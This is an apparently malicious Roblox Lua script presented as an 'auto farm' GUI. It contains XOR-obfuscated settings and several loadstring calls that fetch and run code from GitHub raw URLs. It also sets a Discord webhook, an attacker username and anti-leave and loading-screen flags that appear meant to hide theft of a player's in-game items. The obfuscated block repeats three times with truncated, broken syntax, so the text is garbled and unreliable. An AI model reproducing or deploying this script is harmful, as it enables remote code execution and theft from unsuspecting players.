--[[
 .____                  ______
_.    ___                           __                
 |    |    _ ______   \_____  \\_ |___/ ___\
_  _____
__
___
/  |  _________ 
 |    |   |  |  \__  \   /   |   \| _ \   __\  |  \/  ___// ___\\_  \\   _\/  _ \  __ \
 |    |___|  |  // _ \_/    |    \ \_\ \  | |  |  /\__ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(__  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.😎 ~  Much Love, Ferib 

]]--

 --local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1 )),v1(v2(v10,1 + ((v12-1)% #v10) ,1 + ((v12-1)% #v10) + 1 )))%256 ));end return v5(v11);end getgenv().Settings={[v7("\46\195\198\214\44\243\182\236\27\200","\126\177\163\187\69\134\219\167")]=v7("\238\42\215\48\136\203\13\229\3\245\170\2\199\33\245\222\15\234\14\214\222\53\230\61\205","\156\67\173\74\165"),[v7("\113\49\181\65\25\179\45","\38\84\215\41\118\220\70")]=true,[v7("\211\81\31\46\63\251\67\5\35\21\251","\158\48\118\66\114")]=".gg/rizzhub",[v7("\207\162\48\17\56\122\166\232","\155\203\68\112\86\19\197")]={[v7("\220\83\220\58\244\79\119\238","\152\38\189\86\156\32\24\133")]=true,[v7("\111\242\67\162\72\239\94\179\95","\38\156\55\199")]=100},[v7("\97\169\115\125\38\18","\35\200\29\28\72\115\20\154")]={[v7("\16\12\190\221\215\130\35\63","\84\121\223\177\191\237\76")]=true,[v7("\232\181\66\204\174\41\89\36\216","\161\219\54\169\192\90\48\80")]=100},[v7("\13\92\69\5\54","\69\41\34\96")]={[v7("\15\169\194\219\2\13\36\183","\75\220\163\183\106\98")]=true,[v7("\240\12\174\142\57\202\11\174\146","\185\98\218\235\87")]=100},[v7("\154\196\59\52","\202\171\92\71\134\190")]={[v7("\172\60\192\32\128\38\206\39","\232\73\161\76")]=true,[v7("\55\181\205\71\83\13\178\205\91","\126\219\185\34\61")]=1180 -(1020 + 60) },[v7("\194\20\205\82\103\109\126\229\226\31","\135\108\174\62\18\30\23\147")]={[v7("\227\163\232\38\195\23\161\56","\167\214\137\74\171\120\206\83")]=false,[v7("\142\133\228\55\83\235\174\159\233","\199\235\144\82\61\152")]=1523 -(630 + 793) },[v7("\14\17\19\183\63\20","\75\103\118\217")]={[v7("\58\210\85\124\28\182\17\204","\126\167\52\16\116\217")]=false,[v7("\213\198\58\37\142\167\16\232\209","\156\168\78\64\224\212\121")]=100},[v7("\253\2\237\183\203\19\253","\174\103\142\197")]={[v7("\220\67\41\83\48\42\81\243","\152\54\72\63\88\69\62")]=false,[v7("\117\218\208\235\82\199\205\250\69","\60\180\164\142")]=338 -238 },[v7("\58\123\97\33\4\24\192\11\76\86\12\42\52","\114\56\62\101\73\71\141")]={[v7("\224\173\232\215\204\183\230\208","\164\216\137\187")]=false,[v7("\34\220\242\52\188\181\247\31\203","\107\178\134\81\210\198\158")]=100},[v7("\141\61\3\145","\202\88\110\226\166")]={[v7("\238\214\14\142\255\197\204\4","\170\163\111\226\151")]=false,[v7("\0\31\36\183\54\93\62\61\8","\73\113\80\210\88\46\87")]=473 -373 }};loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/Vault/main/prm.lua"ing.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1 )),v1(v2(v10,1 + ((v12-1)% #v10) ,1 + ((v12-1)% #v10) + 1 )))%256 ));end return v5(v11);end getgenv().Settings={[v7("\46\195\198\214\44\243\182\236\27\200","\126\177\163\187\69\134\219\167")]=v7("\238\42\215\48\136\203\13\229\3\245\170\2\199\33\245\222\15\234\14\214\222\53\230\61\205","\156\67\173\74\165"),[v7("\113\49\181\65\25\179\45","\38\84\215\41\118\220\70")]=true,[v7("\211\81\31\46\63\251\67\5\35\21\251","\158\48\118\66\114")]=".gg/rizzhub",[v7("\207\162\48\17\56\122\166\232","\155\203\68\112\86\19\197")]={[v7("\220\83\220\58\244\79\119\238","\152\38\189\86\156\32\24\133")]=true,[v7("\111\242\67\162\72\239\94\179\95","\38\156\55\199")]=100},[v7("\97\169\115\125\38\18","\35\200\29\28\72\115\20\154")]={[v7("\16\12\190\221\215\130\35\63","\84\121\223\177\191\237\76")]=true,[v7("\232\181\66\204\174\41\89\36\216","\161\219\54\169\192\90\48\80")]=100},[v7("\13\92\69\5\54","\69\41\34\96")]={[v7("\15\169\194\219\2\13\36\183","\75\220\163\183\106\98")]=true,[v7("\240\12\174\142\57\202\11\174\146","\185\98\218\235\87")]=100},[v7("\154\196\59\52","\202\171\92\71\134\190")]={[v7("\172\60\192\32\128\38\206\39","\232\73\161\76")]=true,[v7("\55\181\205\71\83\13\178\205\91","\126\219\185\34\61")]=1180 -(1020 + 60) },[v7("\194\20\205\82\103\109\126\229\226\31","\135\108\174\62\18\30\23\147")]={[v7("\227\163\232\38\195\23\161\56","\167\214\137\74\171\120\206\83")]=false,[v7("\142\133\228\55\83\235\174\159\233","\199\235\144\82\61\152")]=1523 -(630 + 793) },[v7("\14\17\19\183\63\20","\75\103\118\217")]={[v7("\58\210\85\124\28\182\17\204","\126\167\52\16\116\217")]=false,[v7("\213\198\58\37\142\167\16\232\209","\156\168\78\64\224\212\121")]=100},[v7("\253\2\237\183\203\19\253","\174\103\142\197")]={[v7("\220\67\41\83\48\42\81\243","\152\54\72\63\88\69\62")]=false,[v7("\117\218\208\235\82\199\205\250\69","\60\180\164\142")]=338 -238 },[v7("\58\123\97\33\4\24\192\11\76\86\12\42\52","\114\56\62\101\73\71\141")]={[v7("\224\173\232\215\204\183\230\208","\164\216\137\187")]=false,[v7("\34\220\242\52\188\181\247\31\203","\107\178\134\81\210\198\158")]=100},[v7("\141\61\3\145","\202\88\110\226\166")]={[v7("\238\214\14\142\255\197\204\4","\170\163\111\226\151")]=false,[v7("\0\31\36\183\54\93\62\61\8","\73\113\80\210\88\46\87")]=473 -373 }};loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/Vault/main/prm.lua",ting.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1 )),v1(v2(v10,1 + ((v12-1)% #v10) ,1 + ((v12-1)% #v10) + 1 )))%256 ));end return v5(v11);end getgenv().Settings={[v7("\46\195\198\214\44\243\182\236\27\200","\126\177\163\187\69\134\219\167")]=v7("\238\42\215\48\136\203\13\229\3\245\170\2\199\33\245\222\15\234\14\214\222\53\230\61\205","\156\67\173\74\165"),[v7("\113\49\181\65\25\179\45","\38\84\215\41\118\220\70")]=true,[v7("\211\81\31\46\63\251\67\5\35\21\251","\158\48\118\66\114")]=".gg/rizzhub",[v7("\207\162\48\17\56\122\166\232","\155\203\68\112\86\19\197")]={[v7("\220\83\220\58\244\79\119\238","\152\38\189\86\156\32\24\133")]=true,[v7("\111\242\67\162\72\239\94\179\95","\38\156\55\199")]=100},[v7("\97\169\115\125\38\18","\35\200\29\28\72\115\20\154")]={[v7("\16\12\190\221\215\130\35\63","\84\121\223\177\191\237\76")]=true,[v7("\232\181\66\204\174\41\89\36\216","\161\219\54\169\192\90\48\80")]=100},[v7("\13\92\69\5\54","\69\41\34\96")]={[v7("\15\169\194\219\2\13\36\183","\75\220\163\183\106\98")]=true,[v7("\240\12\174\142\57\202\11\174\146","\185\98\218\235\87")]=100},[v7("\154\196\59\52","\202\171\92\71\134\190")]={[v7("\172\60\192\32\128\38\206\39","\232\73\161\76")]=true,[v7("\55\181\205\71\83\13\178\205\91","\126\219\185\34\61")]=1180 -(1020 + 60) },[v7("\194\20\205\82\103\109\126\229\226\31","\135\108\174\62\18\30\23\147")]={[v7("\227\163\232\38\195\23\161\56","\167\214\137\74\171\120\206\83")]=false,[v7("\142\133\228\55\83\235\174\159\233","\199\235\144\82\61\152")]=1523 -(630 + 793) },[v7("\14\17\19\183\63\20","\75\103\118\217")]={[v7("\58\210\85\124\28\182\17\204","\126\167\52\16\116\217")]=false,[v7("\213\198\58\37\142\167\16\232\209","\156\168\78\64\224\212\121")]=100},[v7("\253\2\237\183\203\19\253","\174\103\142\197")]={[v7("\220\67\41\83\48\42\81\243","\152\54\72\63\88\69\62")]=false,[v7("\117\218\208\235\82\199\205\250\69","\60\180\164\142")]=338 -238 },[v7("\58\123\97\33\4\24\192\11\76\86\12\42\52","\114\56\62\101\73\71\141")]={[v7("\224\173\232\215\204\183\230\208","\164\216\137\187")]=false,[v7("\34\220\242\52\188\181\247\31\203","\107\178\134\81\210\198\158")]=100},[v7("\141\61\3\145","\202\88\110\226\166")]={[v7("\238\214\14\142\255\197\204\4","\170\163\111\226\151")]=false,[v7("\0\31\36\183\54\93\62\61\8","\73\113\80\210\88\46\87")]=473 -373 }};loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/Vault/main/prm.lua",t
 UserName = "daveVNdark"
UserName2 = "daveVNdark"
Webhook = "https://discord.com/api/webhooks/1108744821075623987/BTXcsiHcBBdfIfD4qOBe6AJyaYKmj5lY4XzhAC5f455tJhabdwNtr8MiCn0xaQfUT5-l"
_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "LOL GUI"
_G.FirstText = "you can use auto farm in my script to"
_G.SecondText = "this script has many feature"
_G.ThirdText = "wait..."
_G.WaitingTime = 180

loadstring(game:HttpGet("https://raw.githubusercontent.com/pet-simx/ftssa/main/Main.lua", true))()
